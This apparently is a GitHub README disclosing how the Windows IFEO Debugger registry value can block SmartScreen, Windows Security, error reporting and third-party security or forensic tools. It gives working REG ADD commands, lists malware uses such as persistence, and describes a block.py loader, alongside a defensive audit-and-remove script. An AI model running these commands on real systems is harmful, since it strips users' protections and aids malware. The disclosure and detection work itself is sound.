abdulkadir-gungor/Block_Smartscreen_and_Security_Center_on_Windows_Operating_Systems

Blocking smartscreen, security center, forensic processes and 3rd party security applications on Windows Operating Systems

Block Smartscreen and Security Center on Windows Operating Systems

  On the evening of May 29 (2022), I made the necessary notifications to the "Microsoft Security Center" [VULN-068278]. However, according to the reply received by e-mail on June 10: "We determined that an immediate fix will not be released for the reported behavior. It was recommended to harden because the relevant vulnerability requires Administrator authority. We have closed this case." For this reason, I wanted to warn users by posting this vulnerability or weakness on my GitHub account.

  If a subkey named after an executable (for example smartscreen.exe) is created under "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" and a Debugger value is set in it, Windows starts the program named in Debugger instead whenever that executable is launched, passing the original command line to it as arguments. The intended use is to attach a debugger at process start. If the program named in Debugger never starts the original executable, it effectively replaces it, and the original never runs. This works for any image name, including important Windows processes, and it is applied to every launch until the value is removed.

  For example, to block SmartScreen:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe" /v Debugger /d "cmd.exe /C >null: 2>null:"

  For example, to block Windows Security (the Security Center front end through which Windows Defender and other tools are managed) and Windows Error Reporting (WerFault.exe):

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\securityhealthhost.exe" /v Debugger /d "cmd.exe /C >null: 2>null:"
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\secHealthUI.exe" /v Debugger /d "cmd.exe /C >null: 2>null:"
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\werFault.exe" /v Debugger /d "cmd.exe /C >null: 2>null:"
The purposes of using this vulnerability can basically be listed as follows.
1) It can provide persistence for malware: the Debugger value is read on every launch of the target image, so the attacker's program is started each time the victim program is started.
2) Although it differs in function and structure, it achieves an effect similar to attacks that interfere with the system call table: the request to start a program is transparently redirected to attacker-chosen code, here without any kernel-mode component.
3) Security measures integrated with Windows, such as SmartScreen and Windows Defender, can be blocked. Windows Defender itself cannot be blocked directly this way, but it is prevented from running by blocking the components it needs in order to work. In the example, Windows Security Center has been prevented from working and its related components have become inoperable.
4) In particular, third-party virus scanners and security software can be blocked, and so can any other third-party program.
5) Processes integrated with Windows that are used for forensic purposes can be blocked.
6) By blocking components that Windows itself needs, operations such as "sending error reports" and "receiving updates" can be rendered inoperable. For example, by blocking the "cacls" command, the user and Windows are prevented from viewing or changing the access control lists of certain folders and files with that tool.
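What the REG ADD lines above and the list of targets leave behind on a machine is a set of Debugger values under the IFEO key, so the check a defender wants is an audit of that key. The script below is an added example written for this page, not code from the repository; it parses the text that `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /s` prints, rates every Debugger entry, and emits the REG DELETE commands that undo the hijack. The embedded SAMPLE_REG_QUERY is a constructed imitation of that output after the three commands above have been run, and the SECURITY_PROCESSES and KNOWN_DEBUGGERS lists are assumptions chosen for the example.

```python
r"""ifeo_audit.py: find and undo Image File Execution Options (IFEO) Debugger hijacks.

Added example, not part of the original repository. It parses the text printed by
    reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /s
lists every image name that carries a Debugger value, rates each entry, and emits the
REG DELETE lines that remove the hijack. SAMPLE_REG_QUERY is a constructed imitation of
that output; SECURITY_PROCESSES and KNOWN_DEBUGGERS are assumed lists chosen for this example.
"""
import re
import sys
from dataclasses import dataclass

IFEO_ROOT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
IFEO_SHORT = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"

# Images whose hijack disables protection or forensics (assumed list; lower-case).
SECURITY_PROCESSES = {
    "smartscreen.exe", "securityhealthhost.exe", "sechealthui.exe",
    "securityhealthservice.exe", "msmpeng.exe", "mpcmdrun.exe",
    "werfault.exe", "cacls.exe", "icacls.exe",
}
# A Debugger value that points at a genuine debugger is normal developer usage (assumed list).
KNOWN_DEBUGGERS = ("windbg.exe", "windbgx.exe", "cdb.exe", "ntsd.exe", "vsjitdebugger.exe")


@dataclass
class Finding:
    image: str      # subkey name, i.e. the executable being intercepted
    debugger: str   # raw Debugger value; Windows runs this with the original command line appended
    severity: str   # "high": security/forensic process, "medium": other image, "info": real debugger


def parse_reg_query(text):
    """Return {image_name: debugger_value} for every direct IFEO subkey with a Debugger value."""
    entries = {}
    current = None
    for line in text.splitlines():
        if line.startswith(IFEO_ROOT + "\\"):
            current = line[len(IFEO_ROOT) + 1:].strip().lower()
            continue
        m = re.match(r"^\s+Debugger\s+REG_(?:EXPAND_)?SZ\s+(.*)$", line, re.IGNORECASE)
        # Nested keys (e.g. foo.exe\PerfOptions) are not consulted for Debugger, so skip them.
        if m and current is not None and "\\" not in current:
            entries[current] = m.group(1).strip()
    return entries


def debugger_executable(value):
    """First token of a Debugger command line, with surrounding quotes removed."""
    value = value.strip()
    if value.startswith('"'):
        end = value.find('"', 1)
        return value[1:end] if end > 0 else value[1:]
    return value.split()[0] if value else ""


def audit(text):
    """Rate every IFEO Debugger entry found in reg query output, sorted by image name."""
    findings = []
    for image, debugger in sorted(parse_reg_query(text).items()):
        exe = debugger_executable(debugger).lower()
        if image in SECURITY_PROCESSES:
            severity = "high"     # even a real debugger here keeps the component from doing its job
        elif any(exe.endswith(d) for d in KNOWN_DEBUGGERS):
            severity = "info"     # a developer attached a debugger on purpose
        else:
            severity = "medium"   # cmd.exe, a dropped binary, etc. silently replaces the image
        findings.append(Finding(image, debugger, severity))
    return findings


def remediation_commands(findings):
    """REG DELETE lines that undo each high/medium finding; run them from an elevated prompt."""
    return [
        f'REG DELETE "{IFEO_SHORT}\\{f.image}" /v Debugger /f'
        for f in findings if f.severity in ("high", "medium")
    ]


# Constructed sample of "reg query ... /s" output (not captured from a real machine).
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions
    mscorwks.dll    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\myservice.exe
    Debugger    REG_SZ    "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbg.exe" -g

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe
    Debugger    REG_SZ    cmd.exe /C >null: 2>null:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SecurityHealthHost.exe
    Debugger    REG_SZ    cmd.exe /C >null: 2>null:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\werFault.exe
    Debugger    REG_SZ    cmd.exe /C >null: 2>null:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe
    Debugger    REG_SZ    C:\Users\Public\updater.exe
"""

if __name__ == "__main__":
    # Audit piped reg.exe output if there is any, otherwise the embedded sample.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_REG_QUERY
    results = audit(text)
    for f in results:
        print(f"[{f.severity:6}] {f.image:28} Debugger = {f.debugger}")
    for cmd in remediation_commands(results):
        print(cmd)
```

On a Windows host, run `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /s | python ifeo_audit.py` from an elevated prompt; with nothing piped in it audits the embedded sample. An entry is rated high whenever the image is a security or forensic component, even if the Debugger value names a real debugger, because attaching a debugger stops the component just as effectively as cmd.exe does.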

Video and Screenshots of the Vulnerability

  A short video demonstrating the vulnerability has been posted on YouTube. It can be viewed at the link below.

[YouTube Link] https://www.youtube.com/watch?v=_rQrLeDaFSU

[ScreenShot 1] [ScreenShot 2] [ScreenShot 3] (images not reproduced in this text)

Exploiting the Vulnerability

  As an example, a script has been written to show how malware can exploit this vulnerability. The "block.py" script has been added to the repository as an example of what we call the first stage of a malware attack.

  It first blocks SmartScreen and Windows Security from working, so that Windows Defender cannot work, and then runs the malware:

block.py

(Administrator authority)>> block.py malware.exe

Additional information on malware

  To put the vulnerability in context, basic information about malware-type attacks is given below.

A) Ideal Malware Attacks

malware_1 [jpg source: From the training notes, Abdulkadir GÜNGÖR]

B) Types of Malware

malware_2_type [jpg source: From the book "Linux İşletim Sisteminde Malware Analizi", Abdulkadir GÜNGÖR, ISBN:978-625-409-378-4]

C) Final Stage

malware_3 [jpg source: From the training notes, Abdulkadir GÜNGÖR]

Disclaimer

  Information and projects published by me on GitHub are used entirely at the user's own risk. I am not responsible in any way for any kind of damage done to your computer, operating system or programs as a result of this project. Make sure to use virtual systems as a test environment!

Legal Warning

  Run your tests on virtual machines. Responsibility for illegal use belongs to the user. Shared for educational purposes.